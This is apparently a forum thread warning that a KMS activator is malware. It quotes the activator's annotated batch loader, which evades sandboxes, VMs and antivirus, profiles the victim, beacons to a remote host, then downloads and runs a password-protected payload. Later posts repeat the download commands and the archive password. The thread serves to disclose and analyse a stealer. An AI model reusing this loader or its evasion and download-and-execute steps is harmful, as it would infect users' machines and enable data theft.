
maorosh
It's similar to Windows Activator by Goddy [v4.8] — the same group of shady people.
maorosh
Malware. Here is some of the malicious code, found inside the source code:

ZZZZZZZZZZZZ

rem ---------------------------------------------------------------------------
rem NOTE(review): this label was quoted in a forum thread as malicious code
rem found inside a KMS activator. It is annotated for analysts, not cleaned up.
rem Observed behaviour, in order: a date-based kill switch, a Sandboxie check,
rem a run-once registry marker, a VM check, AV process and file checks, a drop
rem of curl.exe into System32, collection of the public IP and country, a
rem beacon to a remote PHP endpoint, then download of a password-protected
rem 7z archive whose m.bat is executed before staging files are deleted.
rem The guillemet and low-9 quote characters throughout are encoding artefacts
rem of the double-quote character - the script as quoted will not run verbatim.
rem ---------------------------------------------------------------------------
:KMSReActivation

rem Detect 32- vs 64-bit Windows. PROCESSOR_ARCHITEW6432 is only defined when a
rem 32-bit cmd.exe is running under WOW64 on a 64-bit host.
set «osB=%PROCESSOR_ARCHITECTURE%»

if defined PROCESSOR_ARCHITEW6432 set «osB=AMD64»

rem On x86 use the plain Program Files path and no reg.exe view flag; on 64-bit
rem point pf at the 32-bit Program Files and query the 32-bit registry view.
if "%osB%"==«x86» (

set «bits=»

set «pf=%SystemDrive%\Program Files»

) else (

set «pf=%SystemDrive%\Program Files (x86)»

set «bits=/reg:32»

)

rem Two-digit year used by the kill-switch dates below, i.e. 2023.
set yn=23

rem Read Day, Month and Year from WMI into variables of the same name.
for /f %%a in ('wmic path win32_LocalTime Get Day^,Month^,Year /value') do >nul set "%%a"

rem Zero-pad Month to two digits; keep only the last two digits of Year.
rem Day is deliberately left unpadded, so dt is DMMYY or DDMMYY.
set Month=00%Month%

set Month=%Month:~-2%

set Year=00%Year%

set Year=%Year:~-2%

set dt=%Day%%Month%%Year%

rem Load name=value pairs from the staged config file tmp\cnf. The d1, d2, d3
rem and m1 values below are expected to come from here; the file itself is not
rem shown in this excerpt.
set «cnfv=%tmp%\cnf»

for /f «usebackq delims=;» %%i in ("%cnfv%") do set %%~i

rem Kill switch: three blacklisted days in the same month of 2023. If today is
rem one of them the loader exits without doing anything.
set «dt1v=%d1%%m1%%yn%»

set «dt2v=%d2%%m1%%yn%»

set «dt3v=%d3%%m1%%yn%»

if %dt% equ %dt1v% exit

if %dt% equ %dt2v% exit

if %dt% equ %dt3v% exit

rem Sandbox evasion: bail out if SbieSvc.exe, the Sandboxie service, is running.
for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq SbieSvc.exe» /fo csv /nh') do set sb=%%~i

if "%sb%" equ «SbieSvc.exe» exit

rem Run-once infection marker: exit if the Alu key already exists, otherwise
rem create it so a later run of this label stops here.
reg query «HKLM\SOFTWARE\Microsoft\Alu» /s %bits%

if %ERRORLEVEL% equ 0 exit

reg Add «HKLM\SOFTWARE\Microsoft\Alu» /f %bits%

rem VM evasion: read the product name from two registry locations and exit on
rem KVM, VirtualBox or a generic Virtual Machine string.
for /f «tokens=2*» %%a in (' reg query «HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation» /v «SystemProductName» ') do set vm1="%%b"

for /f «tokens=2*» %%a in (' reg query «HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current» /v «SystemProductName» ') do set vm2="%%b"

if %vm1% equ «KVM» exit

if %vm1% equ «VirtualBox» exit

if %vm2% equ «Virtual Machine» exit

rem AV evasion by process name: ekrn.exe is ESET's service, QHActiveDefense.exe
rem is Qihoo 360. Either one running aborts the loader.
for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq ekrn.exe» /fo csv /nh') do set sb=%%~i

if "%sb%" equ «ekrn.exe» exit

for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq QHActiveDefense.exe» /fo csv /nh') do set sb=%%~i

if "%sb%" equ «QHActiveDefense.exe» exit

rem AV evasion by install directory: the command name is split by v70 and v71,
rem which presumably are empty so this expands to dir - they are not set in
rem this excerpt and may come from the cnf file. A successful recursive listing
rem of any Kaspersky Lab exe means Kaspersky is installed, so exit.
d%v70%i%v71%r /S "%SystemDrive%\Program Files\Kaspersky Lab\*.exe"

if %ERRORLEVEL% equ 0 exit

d%v70%i%v71%r  /S "%SystemDrive%\Program Files (x86)\Kaspersky Lab\*.exe"

if %ERRORLEVEL% equ 0 exit

rem Stage a curl.exe into System32 if none is present, first from a GitHub
rem repository and then from an attacker-controlled host. Writing into
rem System32 implies the loader expects to be running elevated. TLS 1.2 is
rem forced for the PowerShell WebClient download. Abort if neither source
rem produced the binary.
if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://github.com/cloud1cybertron/wincurl/raw/main/curl.exe', '%windir%\System32\curl.exe')"

if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://zelticloud.net/cu/curl.exe', '%windir%\System32\curl.exe')"

if not exist %windir%\System32\curl.exe exit

rem Re-read the config file for the pid and sid values. p1 and s1 are not used
rem in the visible lines; presumably they are consumed by the dropped m.bat.
set «cnfv=%tmp%\cnf»

for /f «usebackq delims=;» %%i in ("%cnfv%") do set %%~i

set p1=%pid%

set s1=%sid%

rem Victim profiling: public IP and country code from ipinfo.io. The -k flag
rem disables TLS certificate verification on every curl call in this script.
for /f «tokens=* delims= » %%a in ('curl ipinfo.io/ip -k') do set «ei=%%~a»

for /f «tokens=* delims= » %%a in ('curl ipinfo.io/country -k') do set «ec=%%~a»

rem Windows major version from the OS caption, last match wins.
for %%i in (7 8 8.1 10 11) do (wmic os get caption|(>nul findstr /ilc:«Windows %%i»)&&(set es=%%i))

rem Loop counter for the 8-character random id generated below.
set didl=8

setlocal EnableDelayedExpansion EnableExtensions

rem Check-in beacon to a remote PHP endpoint with a fixed user-agent. The
rem response is stored in an obfuscated variable name and is not referenced
rem anywhere in this excerpt.
for /f «tokens=* delims= » %%a in ('curl -k c.zeltitmp.net/c01.php --user-agent «c010101» ') do set «aaajkbkdfkjlgjfdkljhg4df=%%~a»

rem Build ed, an 8-character random lowercase hex string, one nibble per pass.
set num_t=16

set «num_set=0123456789abcdef»

:grmd

set /a «rnd=%num_t%*%random%/32768»

set «ed=!num_set:~%rnd%,1!%ed%»

set /a «didl-=1»

if %didl% gtr 0 goto grmd

rem Pick a browser user-agent at random from a list that the forum post
rem truncated. uat is not used by the download that follows, which sends its
rem own fixed user-agent.
set /a rg1=(%random%%%100)+1

if %rg1% == 1 set «uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5377.168 Safari/537.36»

if %rg1% == 2 set «uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5368.101 Safari/537.36»

if %rg1% == 3 set «uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5386.123 Safari/537.36»

if %rg1% == 4 set «uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like .................................

rem Payload stage: fetch a password-protected 7z archive, following redirects
rem and without certificate verification, into the temp directory.
curl -k -o „%tmp%\m.7z“ -L „zeltitmp.net/pp/m.7z“ --user-agent „cnfvp201“

rem Extract with the hard-coded archive password using the installed 7-Zip.
rem If 7-Zip is not under pf this fails silently and nothing is executed.
»%pf%\7-zip\7z.exe" x "%tmp%\m.7z" -o"%tmp%" -pconfigvpnG2012885838482012ggg -y

rem Execute the dropped batch file via powershell if extraction produced it.
if exist %tmp%\m.bat powershell %tmp%\m.bat

rem Cleanup: removes the config file and cc.7z. Note that the archive written
rem above is m.7z, so the downloaded archive is not deleted in this excerpt.
del %tmp%\cnf

del %tmp%\cc.7z

exit
maorosh
It's a stealer.

`
:: password configvpnG2012885838482012ggg
rem Same download as in the main listing: -k disables certificate verification,
rem -L follows redirects, and the user-agent is a fixed token rather than the
rem randomly chosen browser string the script prepares. The archive password
rem above is hard-coded in the loader.
curl -k -o «m.7z» -L «zeltitmp.net/pp/m.7z» --user-agent «cnfvp201»
rem From m.bat
maorosh
Ratiborus is great. I don't know why others produce such junk.
maorosh
Dropper for the malware:
rem Same two stages as the main listing, quoted with the variable expansions
rem lost: the tmp prefix is missing from the output path and the user-agent is
rem empty. Compare the main listing for the original values.
curl -k -o "\m.7z" -L «zeltitmp.net/pp/m.7z» --user-agent ""

rem Extracts the archive with the hard-coded password into an empty output
rem path, again because the tmp expansion was dropped in this quote.
«C:\Program Files (x86)\7-Zip\7z.exe» x "\m.7z" -o"" -pconfigvpnG2012885838482012ggg -y